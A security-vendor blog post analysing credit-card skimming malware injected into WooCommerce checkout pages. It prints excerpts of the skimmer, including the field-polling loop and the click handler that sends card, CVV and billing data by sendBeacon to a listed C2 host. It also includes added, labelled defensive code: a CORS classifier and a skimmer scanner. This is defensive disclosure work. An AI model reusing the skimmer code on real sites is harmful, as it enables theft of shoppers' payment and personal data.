Sophisticated & Stealthy Formjacking Malware Targets E-Commerce Checkout Pages




The Wordfence Threat Intelligence team recently uncovered a sophisticated formjacking malware targeting WooCommerce sites. This malware injects a fake payment form into legitimate checkout processes and exfiltrates sensitive customer data to a remote Command & Control (C2) server. Unlike traditional card skimmers that simply overlay existing forms, this variant carefully integrates with the WooCommerce site’s design and payment workflow, making it particularly difficult for site owners and users to detect.

A Wordfence user sent the malicious script to us via email on April 24, 2025. A detection signature was developed on April 25, refined and released to Wordfence Premium users on May 6, 2025, following our quality assurance process. Users of the free version of Wordfence will receive the same signature on June 5, 2025, after the standard 30-day delay.

We provide comprehensive security monitoring and malware removal services as part of our offerings for Wordfence Care and Response customers. If a security incident occurs, our incident response team will identify the root cause, remove any malware, and assist with related issues stemming from the infection. Malware discovered during cleanup is added to our Threat Intelligence database, which holds over 4.3 million unique malicious samples. Utilizing our entire signature set, with a 30 day delay on newly released malware signatures for free users, the Wordfence plugin and Wordfence CLI scanners detect and block over 99% of these threats. Wordfence CLI also works independently of WordPress, making it a strong server-level detection tool and a key part of our layered security approach to secure the web by defense in depth.

Malware Breakdown: A Closer Look

Visually, the malware offers no obvious red flags, as it imitates legitimate JavaScript with professional formatting and conventional syntax that masks its harmful capabilities. It appears to be a standard JavaScript file that could be part of a legitimate theme or plugin. The well-formatted code, consistent indentation, and seemingly innocuous variable names give it an air of legitimacy. Nothing stands out visually that would immediately identify it as malicious.

let isChecked = localStorage.getItem("already_checked");
let btnId = "place_order"; // Button ID
let btnClass = ""; // Class if no ID
let isFrame = true; // Set to true if this is an iframe
let url5555 = "https://searchpixelstuff.top/api/accept-car";
let iframeId = "";
let iframeClass = "__PrivateStripeElement";
let loaded = false;
let loaded2 = false
let urlInclude = "checkout";

The script checks whether it is running on a checkout page and whether it has already harvested data from the current session. This simple check prevents the malware from triggering multiple times on the same user session, which could alert the user to suspicious activity.

function allChecked() {
    return document.URL.includes(urlInclude) && localStorage.getItem("already_checked") !== "1";
}

More importantly, the script injects a completely fake but professional-looking payment form into the checkout process using the renderForm() function. This function creates an HTML div element with styling that closely mimics legitimate payment forms, complete with fields for a credit card number, an expiration date, and a security code. It also includes an SVG image that resembles a generic payment card icon for added legitimacy.

What sets this script apart from other similar malicious scripts is the data exfiltration mechanism.

function rednerBtn() {
    const checkout = document.getElementById("place_order")
    checkout.classList.add("s_div1_btn")
    checkout.addEventListener("click", () => {
        let dataObject = {
            domain: window.location.origin,
            card: localStorage.getItem("cardNum"),
            exp: localStorage.getItem("exp"),
            cvv: localStorage.getItem("cvv"),
            first_name: localStorage.getItem(firstNameVal) ? localStorage.getItem(firstNameVal) : "",
            last_name: localStorage.getItem(lastNameVal) ? localStorage.getItem(lastNameVal) : "",
            company: localStorage.getItem(companyVal) ? localStorage.getItem(companyVal) : "",
            address1: localStorage.getItem(addrOneVal) ? localStorage.getItem(addrOneVal) : "",
            address2: localStorage.getItem(addrTwoVal) ? localStorage.getItem(addrTwoVal) : "",
            city: localStorage.getItem(cityVal) ? localStorage.getItem(cityVal) : "",
            postcode: localStorage.getItem(postCodeVal) ? localStorage.getItem(postCodeVal) : "",
            phone: localStorage.getItem(phoneVal) ? localStorage.getItem(phoneVal) : "",
            email: localStorage.getItem(mailVal) ? localStorage.getItem(mailVal) : "",
            uagent: navigator.userAgent
        };
        let dobj = {
            domain: window.location.origin,
            dataObject: dataObject
        }
        if(localStorage.getItem("already_checked") !== "1"){
            navigator.sendBeacon(url5555, JSON.stringify(dobj));
            if(localStorage.getItem("cardNum") && localStorage.getItem("exp") && localStorage.getItem("cvv")){
                localStorage.setItem("already_checked", "1");
            }
        }
    })
}

The malware author repurposed the browser’s localStorage mechanism – typically used by websites to remember user preferences – to silently store stolen data and maintain access even after page reloads or when navigating away from the checkout page.

By storing captured payment card details and billing information in localStorage rather than only capturing it once during form submission, the malware gains several advantages:

  • Persistence across sessions: Even when the user closes the browser tab or completely restarts the browser, the stolen credentials remain accessible to the malware upon return to the compromised site.
  • Resilience against interruptions: If network connectivity is disrupted during the initial capture, the malware doesn’t lose the stolen data – it remains safely stored until connectivity is restored.
  • Anti-forensic capabilities: By controlling when data is transmitted rather than sending it immediately, the malware can better obscure the connection between the user’s form submission and the exfiltration event, making it harder to detect through timeline analysis.

This technique demonstrates how the attackers have repurposed legitimate web technologies specifically designed for user convenience for uses that directly undermine security and privacy.

Upon pressing the “Place Order” button, the script sends the collected credit card data and personal info to the hackers while allowing normal order processing to continue.

For silent, non-blocking data exfiltration, this malware uses the navigator.sendBeacon() method:

navigator.sendBeacon(url5555, JSON.stringify(dobj));

The navigator.sendBeacon() method allows for the asynchronous transfer of small amounts of data from the User Agent to a web server. It makes POST requests without waiting for a response and without triggering Cross-Origin Resource Sharing (CORS) preflight or being easily intercepted.

Unlike fetch() or XMLHttpRequest(), which may trigger a CORS preflight (an OPTIONS request) when certain headers or methods are used, sendBeacon() is intentionally limited in how it works to avoid that additional request and traffic.

More specifically, the sendBeacon() function adheres to these rules for simple requests:

  • sendBeacon() only issues POST requests, which is all the malware needs.
  • Because the attackers pass the payload as a plain string, the browser sets the Content-Type header to text/plain;charset=UTF-8.
  • It sends no custom headers.

According to the fetch specifications, a simple cross-origin request (that doesn’t require a preflight) must:

  • Use GET, HEAD, or POST
  • Not set custom headers (e.g., Authorization, X-My-Custom-Header)
  • Use allowed content types: text/plain, application/x-www-form-urlencoded, or multipart/form-data

The function sendBeacon() conforms to these limits, which eliminates the need to send an OPTIONS preflight request.
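To make the preflight rules above concrete, here is an added example (not code from the Wordfence post) that applies the simple-request checks to a request description and shows why the skimmer's sendBeacon() POST never produces an OPTIONS request while a fetch() POST of application/json does. The request descriptions at the bottom are constructed inputs, not captured traffic, and the shop.example host is a placeholder.

```javascript
// Added example, not code from the Wordfence post: a classifier that applies the
// CORS "simple request" rules quoted above, so you can see why the malware's
// navigator.sendBeacon() POST never produces an OPTIONS preflight while a fetch()
// POST of application/json does. The request descriptions at the bottom are
// constructed inputs, not captured traffic.

const SIMPLE_METHODS = new Set(["GET", "HEAD", "POST"]);
// Request headers a browser may send cross-origin without a preflight.
const SAFELISTED_HEADERS = new Set(["accept", "accept-language", "content-language", "content-type"]);
const SAFELISTED_CONTENT_TYPES = new Set([
  "text/plain",
  "application/x-www-form-urlencoded",
  "multipart/form-data",
]);

// Returns { simple, reasons }: simple is true when no rule is broken,
// reasons lists every rule that would force a preflight.
function classifyCorsRequest({ method, headers = {} }) {
  const reasons = [];
  const verb = method.toUpperCase();
  if (!SIMPLE_METHODS.has(verb)) reasons.push(`method ${verb} is not GET/HEAD/POST`);
  for (const [name, value] of Object.entries(headers)) {
    const lname = name.toLowerCase();
    if (!SAFELISTED_HEADERS.has(lname)) {
      reasons.push(`custom header ${name}`);
      continue;
    }
    if (lname === "content-type") {
      // Only the MIME essence is checked; parameters such as charset are ignored.
      const essence = value.split(";")[0].trim().toLowerCase();
      if (!SAFELISTED_CONTENT_TYPES.has(essence)) reasons.push(`content type ${essence} needs a preflight`);
    }
  }
  return { simple: reasons.length === 0, reasons };
}

// Describes what the browser puts on the wire for navigator.sendBeacon(url, body):
// the method is always POST, and a string body (the malware passes JSON.stringify
// output) is sent as text/plain;charset=UTF-8 with no other request-specific headers.
function beaconRequestFor(body) {
  const headers = {};
  if (typeof body === "string") headers["Content-Type"] = "text/plain;charset=UTF-8";
  return { method: "POST", headers };
}

// Constructed sample requests (shop.example is a placeholder host).
const BEACON = classifyCorsRequest(beaconRequestFor(JSON.stringify({ domain: "https://shop.example" })));
const JSON_FETCH = classifyCorsRequest({ method: "POST", headers: { "Content-Type": "application/json" } });
const CUSTOM_HEADER_GET = classifyCorsRequest({ method: "GET", headers: { "X-Session": "abc" } });

console.log("sendBeacon(string body):", BEACON);           // simple: true, no OPTIONS request
console.log("fetch POST application/json:", JSON_FETCH);  // simple: false, preflight first
console.log("GET with custom header:", CUSTOM_HEADER_GET); // simple: false, preflight first
```

Two points follow from the classification. First, a simple request means the browser sends the body before it has seen any CORS headers from the server; the server's Access-Control-Allow-Origin only controls whether the page can read the response, and the skimmer never reads one. Second, beacon requests are still governed by Content-Security-Policy connect-src, so a checkout page whose policy lists only the site itself and its payment provider under connect-src would have this call blocked and, with a report-to or report-uri directive, reported.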

It is often used for analytics or diagnostic purposes, since the function can be called when a user closes a page.

As a result, this mechanism doesn’t slow down the checkout process, works even if the user navigates away from the page temporarily, and leaves almost no traces in browser tools when transmitting stolen data to the C2 server. Error messages are not triggered and a response from the C2 server is not expected. Additionally, requests like these are made directly from the browser to the capturing server, which means that these requests won’t show up in log files of infected sites.

The script continuously monitors all billing form fields on the checkout page using multiple setInterval() calls that store all customer information in localStorage:

setInterval(() => {
    if(allChecked()){
        localStorage.setItem(mailVal, document.getElementById(mailVal).value)
    }
}, 1000)
// [Multiple similar intervals for other form fields]

This approach ensures that even if a customer fills out their information but doesn’t immediately complete the order, their data is still captured for later exfiltration.

Intrusion Vector and Affected Components

Based on the investigation and inspection of cached files, the infection appears to have originated from a compromised WordPress admin account, which was used to inject malicious JavaScript via a plugin that allows administrators to add custom code. One observed indicator was the following comment in a cached file:

<!-- start Simple Custom CSS and JS -->

This suggests that the Simple Custom CSS and JS plugin, or a similar custom JavaScript plugin, was used post-compromise to insert JavaScript into the site. It is important to note that this plugin does not appear to have any known vulnerabilities and was likely misused after administrative access was gained.

Unlike typical infections involving malicious PHP files, this case involves JavaScript being dynamically inserted and cached, likely through database-stored plugin settings.

It remains possible that other custom JS injection plugins were used as vectors, especially those that allow inline code rather than saving to static files. Logs were not available at the time of investigation to further validate the source of the initial compromise.

Indicators of Compromise

The malware appears to be predominantly present in cached pages. This suggests that the malicious code may be injected in the database or injected dynamically. If you have a caching plugin, you should be able to scan the cache directory using Wordfence.

Additionally, look out for the following:

  • Use of navigator.sendBeacon() API to external domains during checkout
  • Unexpected JavaScript code running on checkout pages
  • Unusual localStorage activity storing payment information
  • Multiple setInterval calls monitoring billing fields
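The four indicators above can be turned into a static triage check for JavaScript pulled out of a page cache or out of database-stored plugin settings. The scanner below is an added example, not code from the Wordfence post or a Wordfence tool; the two sample scripts it runs on are constructed for the demo, and "c2-placeholder.example" and "shop.example" are placeholder hosts, not real domains.

```javascript
// Added example, not code from the Wordfence post: a static triage scanner for
// JavaScript pulled out of a page cache or out of database-stored plugin settings.
// It checks one script against the four indicators listed above and returns the
// matches. Both sample scripts below are constructed for the demo, and
// "c2-placeholder.example" stands in for a real exfiltration host.

const CARD_KEY_PATTERN = /card|cvv|cvc|exp|pan|ccnum/i;
const INTERVAL_THRESHOLD = 3; // three or more pollers on one page is unusual for shop code

// Collects `let|const|var name = "literal"` so a beacon URL or storage key hidden
// behind a variable (the post's url5555, mailVal) can still be resolved.
function stringAssignments(source) {
  const map = new Map();
  const re = /\b(?:let|const|var)\s+([A-Za-z_$][\w$]*)\s*=\s*(["'`])((?:(?!\2).)*)\2/g;
  let m;
  while ((m = re.exec(source)) !== null) map.set(m[1], m[3]);
  return map;
}

// Hostname of an absolute URL; relative (same-origin) URLs yield null.
function hostOf(urlText) {
  try { return new URL(urlText).hostname; } catch { return null; }
}

// Returns { suspicious, findings } for one script; siteHost is the shop's own hostname.
function scanScript(source, siteHost) {
  const findings = [];
  const vars = stringAssignments(source);
  let m;

  // Indicator 1: navigator.sendBeacon() whose destination is not the shop itself.
  const beaconRe = /navigator\.sendBeacon\s*\(\s*(?:(["'`])((?:(?!\1).)*)\1|([A-Za-z_$][\w$]*))/g;
  while ((m = beaconRe.exec(source)) !== null) {
    const target = m[2] !== undefined ? m[2] : vars.get(m[3]);
    if (target === undefined) {
      findings.push(`sendBeacon with unresolved destination ${m[3]}`);
      continue;
    }
    const host = hostOf(target);
    if (host !== null && host !== siteHost) findings.push(`sendBeacon to external host ${host}`);
  }

  // Indicator 2: localStorage.setItem() under a key that looks like payment data.
  const storeRe = /localStorage\.setItem\s*\(\s*(?:(["'`])((?:(?!\1).)*)\1|([A-Za-z_$][\w$]*))/g;
  while ((m = storeRe.exec(source)) !== null) {
    const key = m[2] !== undefined ? m[2] : (vars.get(m[3]) ?? m[3]);
    if (CARD_KEY_PATTERN.test(key)) findings.push(`localStorage key "${key}" looks like payment data`);
  }

  // Indicator 3: many setInterval() pollers, the pattern used to watch billing fields.
  const intervals = (source.match(/\bsetInterval\s*\(/g) || []).length;
  if (intervals >= INTERVAL_THRESHOLD) findings.push(`${intervals} setInterval pollers`);

  // Indicator 4: the script reads the page URL and mentions "checkout", i.e. it
  // only arms itself on the checkout page.
  const readsUrl = /document\.URL|location\.(?:href|pathname)/.test(source);
  const mentionsCheckout = /checkout/i.test(source) || [...vars.values()].some((v) => /checkout/i.test(v));
  if (readsUrl && mentionsCheckout) findings.push("reads page URL and gates on checkout");

  return { suspicious: findings.length >= 2, findings };
}

// Constructed sample 1: an ordinary same-origin analytics beacon, which should pass.
const BENIGN_ANALYTICS = [
  'const endpoint = "/wp-json/analytics/v1/pageview";',
  'window.addEventListener("pagehide", () => {',
  '  navigator.sendBeacon(endpoint, JSON.stringify({ path: location.pathname }));',
  '});',
  'setInterval(() => localStorage.setItem("lastSeen", Date.now()), 60000);',
].join("\n");

// Constructed sample 2: a script shaped like the one described in the post.
const SKIMMER_LIKE = [
  'let url5555 = "https://c2-placeholder.example/api/accept";',
  'let urlInclude = "checkout";',
  'function allChecked() { return document.URL.includes(urlInclude); }',
  'setInterval(() => { if (allChecked()) localStorage.setItem("cardNum", document.getElementById("cc").value); }, 1000);',
  'setInterval(() => { if (allChecked()) localStorage.setItem("exp", document.getElementById("ex").value); }, 1000);',
  'setInterval(() => { if (allChecked()) localStorage.setItem("cvv", document.getElementById("cv").value); }, 1000);',
  'document.getElementById("place_order").addEventListener("click", () => {',
  '  navigator.sendBeacon(url5555, JSON.stringify({ card: localStorage.getItem("cardNum") }));',
  '});',
].join("\n");

for (const [label, src] of [["benign analytics", BENIGN_ANALYTICS], ["skimmer-like", SKIMMER_LIKE]]) {
  console.log(label, scanScript(src, "shop.example"));
}
```

To use it on a real site, read each cached HTML or JavaScript file (or each custom-code row exported from the database) into a string and pass it to scanScript together with the shop's hostname; a script that hits two or more indicators deserves a manual look. The checks are heuristics over source text, so obfuscated or string-concatenated code can slip past them, and a legitimate script that stores a shipping "expected" date could trip the key pattern; treat the output as a triage queue, not a verdict.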

To protect yourself you can try any of the following:

  • Install browser extensions like uBlock Origin to monitor and block suspicious network activity
  • Use browser developer tools to inspect network requests during checkout for unauthorized data transmissions
  • Check if the checkout page behaves differently than normal – watch for unexpected pop-ups, unusual permission requests, or layout changes
  • When possible, use virtual credit cards or secure payment providers like PayPal that mask the actual card details
  • Consider using disposable payment cards for online transactions to limit exposure
  • Monitor your bank statements regularly for unauthorized charges
  • Clear browser cache and cookies after making purchases on potentially compromised sites
  • Use a dedicated browser or private browsing session for financial transactions

Involved Domains

  • searchpixelstuff.top
  • justmerikschill.top
  • pinkmanpixel.top
  • schoolmeriks.top

The domains above are listed on the Spamhaus DBL and have been identified in malicious campaigns that distribute malware.

Conclusion

In today’s blog post, we highlighted sophisticated credit card skimming malware that masquerades as a legitimate payment form on WooCommerce checkout pages. It employs advanced techniques to blend with the site’s existing design, harvest complete customer and payment data, and secretly transmit this information using methods that evade common detection tools.

The malware uses the browser’s built-in localStorage to temporarily save captured data between page refreshes and to prevent duplicate submissions. By storing values like card numbers, expiration dates, and security codes in localStorage, it creates a hidden store of sensitive information that remains available throughout the customer’s shopping session.

Even more concerning is its method for secretly transmitting data to attackers, which works in the background without disrupting the normal checkout process. Unlike typical data transfers that might be noticeable in security monitoring tools because they happen server-side, these transmissions happen silently, don’t require waiting for responses, continue working even if the customer leaves the page, and most importantly, don’t trigger the security warnings that might alert users or site owners to the data theft.

Wordfence Premium, Care and Response users, as well as paid Wordfence CLI customers, received malware signatures to detect this malware on May 6, 2025. Wordfence free users, and Wordfence CLI free users, will receive this signature after a 30 day delay on June 5, 2025.

If you believe your site has been compromised with this malware, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.
